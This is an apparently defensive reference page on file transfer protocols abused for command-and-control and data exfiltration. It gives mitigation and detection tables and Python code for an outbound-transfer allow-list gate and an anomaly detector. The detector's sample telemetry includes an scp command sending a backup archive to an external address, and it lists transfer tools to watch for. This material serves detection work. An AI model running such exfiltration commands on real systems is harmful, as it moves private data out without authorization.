File Transfer Protocols

In the Deepening Control phase, attackers use file transfer protocols as a C2 channel to maintain persistent communication with compromised systems while evading detection. This sub-technique relies on standard protocols such as FTP, SFTP, FTPS, SCP, and TFTP for command transmission and data exfiltration, exploiting their legitimate presence in corporate environments. Adversaries encode commands within transferred files or use the protocols' control channels for direct command execution, and they benefit from the encryption offered by SFTP and FTPS to obscure malicious traffic. Unlike web protocols, which are often subject to strict proxy inspection, file transfer protocols typically receive less scrutiny from network monitoring, creating security blind spots. Detection requires analyzing anomalous connection patterns, unusual file transfers, unexpected protocol usage, and unauthorized encrypted sessions established through these standard network services.

Mitigations

| ID | Mitigation | Description |
|---|---|---|
| M1031 | Network Intrusion Prevention | Deploy IDS/IPS signatures that flag anomalous SMB/FTP/TFTP/SCP command sequences, unexpected PUT/STOR operations, or encrypted FTPS sessions to untrusted external hosts, and automatically block or isolate offending traffic. |
| M1037 | Filter Network Traffic | Restrict outbound file-transfer protocols to approved servers via explicit allow-lists; force traffic through authenticated gateways that inspect content and enforce size, type, and destination policies. |
| M1030 | Network Segmentation | Place services that legitimately require FTP/SFTP/SMB in isolated DMZ or dedicated VLANs, disallowing peer-to-peer file sharing across trust zones and minimising an attacker's ability to pivot or exfiltrate data. |
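The M1037 entry describes a gateway that enforces destination, size and type policies on outbound transfers. The following is an added example (not code from this page or from any product) of the policy check such a gateway would apply before releasing a transfer: the destination must be allow-listed for the protocol, the file must fit the per-destination size cap and permitted types, and the first bytes of the content are sniffed so that an archive or executable renamed to `.csv` is still refused. The hostnames, size limits, permitted types and magic-byte table are constructed placeholders.

```python
"""Outbound file-transfer policy check for an authenticated gateway.

Added example; the allow-list, limits and hostnames below are constructed
placeholders, not a real deployment's configuration.
"""

# Per protocol: approved destinations and what each may receive (constructed values).
ALLOWLIST = {
    "sftp": {
        "sftp.partner.example": {"max_bytes": 50 * 1024 * 1024, "types": {"csv", "pdf"}},
    },
    "ftps": {
        "ftps.vendor.example": {"max_bytes": 5 * 1024 * 1024, "types": {"csv"}},
    },
}

# Magic-byte prefixes used to check that content matches the claimed extension.
MAGIC = [
    (b"PK\x03\x04", "zip"),
    (b"\x1f\x8b", "gzip"),
    (b"%PDF-", "pdf"),
    (b"MZ", "exe"),
    (b"\x7fELF", "elf"),
]
EXECUTABLE_TYPES = {"exe", "elf"}


def sniff_type(head: bytes):
    """Return the content type implied by the leading bytes, or None if unrecognised."""
    for prefix, kind in MAGIC:
        if head.startswith(prefix):
            return kind
    return None


def evaluate_transfer(protocol, destination, filename, size_bytes, head):
    """Return (allowed, reasons).

    Every failing check appends a reason so the gateway log states exactly
    which policy the transfer violated.
    """
    reasons = []
    policy = ALLOWLIST.get(protocol, {}).get(destination)
    if policy is None:
        # Destination policy is the gate for everything else; stop here.
        reasons.append(f"{protocol} to {destination} is not on the allow-list")
        return False, reasons

    if size_bytes > policy["max_bytes"]:
        reasons.append(f"size {size_bytes} exceeds cap {policy['max_bytes']}")

    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in policy["types"]:
        reasons.append(f"type '{ext or '(none)'}' not permitted for {destination}")

    sniffed = sniff_type(head)
    if sniffed in EXECUTABLE_TYPES:
        reasons.append(f"content is an executable ({sniffed})")
    elif sniffed is not None and sniffed != ext:
        # e.g. a ZIP archive renamed to report.csv
        reasons.append(f"content looks like {sniffed} but extension is '{ext}'")

    return not reasons, reasons


if __name__ == "__main__":
    # Constructed requests: a clean CSV, a ZIP disguised as CSV, and an unapproved FTP host.
    for req in [
        ("sftp", "sftp.partner.example", "report.csv", 1_000_000, b"id,name\n1,a\n"),
        ("sftp", "sftp.partner.example", "report.csv", 1_000_000, b"PK\x03\x04\x14\x00"),
        ("ftp", "203.0.113.10", "report.csv", 1_000, b"id,name\n"),
    ]:
        allowed, why = evaluate_transfer(*req)
        print("ALLOW" if allowed else "DENY", req[:3], why)
```

The magic-byte check is deliberately conservative: unknown content is not rejected on its own, only content that contradicts the declared extension or is executable. A production gateway would extend `MAGIC` and log every decision to the SIEM so the DS0029 content-inspection detections below have a record to correlate with.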

Detection

| ID | Data Source | Detection |
|---|---|---|
| DS0029 | Network Traffic Content | Inspect control and data channels for embedded commands, abnormal banners, or high-entropy payloads; alert when binaries or archives are transferred via FTP/SFTP/TFTP outside scheduled maintenance windows. |
| DS0029 | Network Traffic Flow | Baseline normal file-transfer volumes; flag large outbound transfers over ports 20/21/22/69/445 or sudden SMB sessions between hosts that do not typically share files. |
| DS0017 | Command Execution | Detect unexpected invocation of built-in utilities (ftp.exe, curl -T, scp, net use) by non-administrative processes or scripts, and correlate with subsequent network activity. |
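The Network Traffic Flow and Command Execution rows describe three checks: a per-host volume baseline on the file-transfer ports, novelty of the peer pair, and transfer-tool execution by a non-administrative user correlated with a flow that follows it. The block below is an added example, not code from this page, that implements all three over constructed flow records and process events; the host names, users, addresses and byte counts are placeholders, and the 3-sigma threshold and 90-second correlation window are assumed tuning values.

```python
"""Baseline-and-correlate detections for file-transfer C2 / exfiltration.

Added example. All telemetry below is constructed; hosts, users and IPs are
placeholders rather than data from any real environment.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Ports from the detection table: FTP data/control, SSH (SCP/SFTP), TFTP, SMB.
FILE_TRANSFER_PORTS = {20, 21, 22, 69, 445}
# Built-in transfer utilities whose use by non-admins is worth a look.
TRANSFER_TOOLS = {"ftp", "ftp.exe", "scp", "sftp", "tftp", "tftp.exe"}


@dataclass
class Flow:
    ts: datetime
    host: str        # source host
    dst: str         # destination address
    port: int        # destination port
    bytes_out: int   # bytes sent by the source


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str       # full path of the executable
    cmdline: str
    admin: bool      # True if the process runs with administrative rights


def build_baseline(history):
    """Mean and population std-dev of bytes_out per (host, port) over past flows."""
    buckets = defaultdict(list)
    for f in history:
        if f.port in FILE_TRANSFER_PORTS:
            buckets[(f.host, f.port)].append(f.bytes_out)
    return {k: (mean(v), pstdev(v)) for k, v in buckets.items()}


def detect_flow_anomalies(history, flows, sigma=3.0):
    """DS0029 Network Traffic Flow: new peer, never-used protocol, volume spike."""
    baseline = build_baseline(history)
    known_pairs = {(f.host, f.dst, f.port) for f in history}
    alerts = []
    for f in flows:
        if f.port not in FILE_TRANSFER_PORTS:
            continue
        if (f.host, f.dst, f.port) not in known_pairs:
            alerts.append(("new_peer", f.host, f.dst, f.port))
        stats = baseline.get((f.host, f.port))
        if stats is None:
            alerts.append(("unexpected_protocol", f.host, f.dst, f.port))
        elif f.bytes_out > stats[0] + sigma * stats[1]:
            alerts.append(("volume_anomaly", f.host, f.dst, f.port))
    return alerts


def is_transfer_command(p):
    """True for the utilities named in the table: ftp/scp/sftp/tftp, curl -T, net use."""
    image = p.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    argv = p.cmdline.split()
    if image in TRANSFER_TOOLS:
        return True
    if image in {"curl", "curl.exe"} and "-T" in argv:        # curl upload mode
        return True
    if image in {"net", "net.exe"} and "use" in [a.lower() for a in argv]:
        return True
    return False


def correlate_exec_with_flows(procs, flows, window=timedelta(seconds=90)):
    """DS0017 Command Execution: non-admin transfer tool followed by a matching flow."""
    alerts = []
    for p in procs:
        if p.admin or not is_transfer_command(p):
            continue
        for f in flows:
            if (f.host == p.host and f.port in FILE_TRANSFER_PORTS
                    and timedelta(0) <= f.ts - p.ts <= window):
                alerts.append(("tool_exec_correlated", p.host, p.user, image_name(p), f.dst))
    return alerts


def image_name(p):
    return p.image.replace("\\", "/").rsplit("/", 1)[-1]


# Constructed telemetry: ws-17 normally sends ~2 MB over SSH to an internal file server.
HISTORY = [
    Flow(datetime(2024, 5, 1, 9, 0), "ws-17", "10.0.5.20", 22, 2_000_000),
    Flow(datetime(2024, 5, 1, 14, 0), "ws-17", "10.0.5.20", 22, 2_100_000),
    Flow(datetime(2024, 5, 2, 9, 0), "ws-17", "10.0.5.20", 22, 1_900_000),
]
FLOWS = [
    Flow(datetime(2024, 5, 3, 2, 14, 30), "ws-17", "203.0.113.10", 22, 250_000_000),
    Flow(datetime(2024, 5, 3, 9, 5), "ws-17", "10.0.5.20", 22, 2_050_000),
    Flow(datetime(2024, 5, 3, 9, 6), "ws-17", "10.0.5.40", 443, 5_000_000),
]
PROCS = [
    ProcEvent(datetime(2024, 5, 3, 2, 13, 50), "ws-17", "jdoe", "/usr/bin/scp",
              "scp /tmp/q3-backup.tar.gz svc@203.0.113.10:/in/", False),
    ProcEvent(datetime(2024, 5, 3, 9, 4), "ws-17", "jdoe", "/usr/bin/curl",
              "curl https://intranet.example/status", False),
]


def run_detections(history=HISTORY, flows=FLOWS, procs=PROCS):
    """Run both detections and return their alerts keyed by data source."""
    return {"flow": detect_flow_anomalies(history, flows),
            "exec": correlate_exec_with_flows(procs, flows)}


if __name__ == "__main__":
    for source, alerts in run_detections().items():
        for a in alerts:
            print(source, a)
```

With the constructed data, the 250 MB transfer to a never-seen external host raises both a `new_peer` and a `volume_anomaly` alert, the routine 2 MB transfer stays quiet, the port 443 flow is ignored, and the non-admin `scp` that ran forty seconds before the large flow produces one correlated `tool_exec_correlated` alert; the plain `curl` status check, lacking `-T`, is not treated as a transfer. Population standard deviation is used so a three-sample baseline still yields a usable threshold; in production the baseline would be computed per day over a longer window and the `unexpected_protocol` branch would be the noisier of the three and need an allow-list of hosts that legitimately start using a transfer service.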